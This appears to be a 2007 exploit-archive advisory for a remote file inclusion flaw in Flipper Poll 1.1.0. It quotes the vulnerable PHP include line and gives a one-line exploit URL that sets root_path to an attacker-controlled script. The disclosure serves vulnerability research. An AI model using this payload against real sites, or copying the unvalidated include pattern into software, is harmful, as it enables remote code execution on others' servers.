Flipper Poll 1.1.0 (poll.php root_path) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Flipper Poll 1.1.0 (poll.php root_path) Remote File Include Vulnerability
# Published : 2007-02-02
# Author : xoron
# Previous Title : RPW 1.0.2 (config.php sql_language) Remote File Inclusion Vulnerability
# Next Title : F3Site <= 2.1 Remote Code Execution Exploit

Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------
 
Found: Cyber-Security
cyber-security.org
 
---------------------------------------------------------------------------------
 
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
 
---------------------------------------------------------------------------------

Vuln Code: include_once($root_path . 'config.php');
 
---------------------------------------------------------------------------------
 
Exploit: /poll.php?root_path=evilscripts?
 
---------------------------------------------------------------------------------
 
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
 
---------------------------------------------------------------------------------

# www.Syue.com [2007-02-02]